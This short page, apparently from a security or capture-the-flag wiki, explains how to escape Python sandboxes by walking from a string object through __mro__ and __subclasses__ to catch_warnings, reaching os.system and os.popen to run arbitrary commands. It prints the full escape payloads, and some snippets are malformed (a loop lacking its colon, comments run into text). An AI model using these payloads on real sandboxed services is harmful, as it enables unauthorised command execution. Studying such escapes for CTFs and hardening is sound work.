Navigating Python Objects
Navigate python objects and some tricks to bypass python sandbox protections, pyjails.
Methods
__class__
Returns the object (class) to which the type belongs.
__mro__
Returns a tuple containing the base class inherited by the object. Methods are parsed in tuple order.
__subclasses__
Each new class retains references to subclasses, and this method returns a list of references still available in the class.
__builtins__
Returns the builtin methods included in a function.
__globals__
A reference to a dictionary that contains global variables for a function.
__base__
Returns the base class inherited from the object (__ base__ and __ mro__ are used to find the base class).
__init__
Class initialization method.
dir() command to show all methods and attributes of the object.
Navigation
Goal: Find warnings (catch_warnings) because it imports the sys module (see HERE), and from sys you can reach os.
Get the string class
''.__class__
# <class ‘str’>Going up by getting the inherited base classes (object)
''.__class__.__mro__
# [<class ‘object'> <class ‘str’> ]Get all subclasses of object
''.__class__.__mro__[1].__subclasses__()
# [<class ‘…’> …]Look for catch_warnings and its index.
for i in range(450)
print(i, end=' ')
print(''.__class__.__mro__[1].__subclasses__()[i].__name__)
# index NAME
# index NAME
# etc…Import os and call the system. You can't see the output.
''.__class__.__mro__[1].__subclasses__()[<INDEX>]()._module.__builtins__['__import__']('os').system("COMMAND")
# error_code or 0 if the command was executed correctlyImport os and call popen with read(). You can see the output.
''.__class__.__mro__[1].__subclasses__()[<INDEX>]()._module.__builtins__['__import__']('os').popen("COMMAND").read()Resources
pyjailbreaker (yet to be seen)
Last updated
Was this helpful?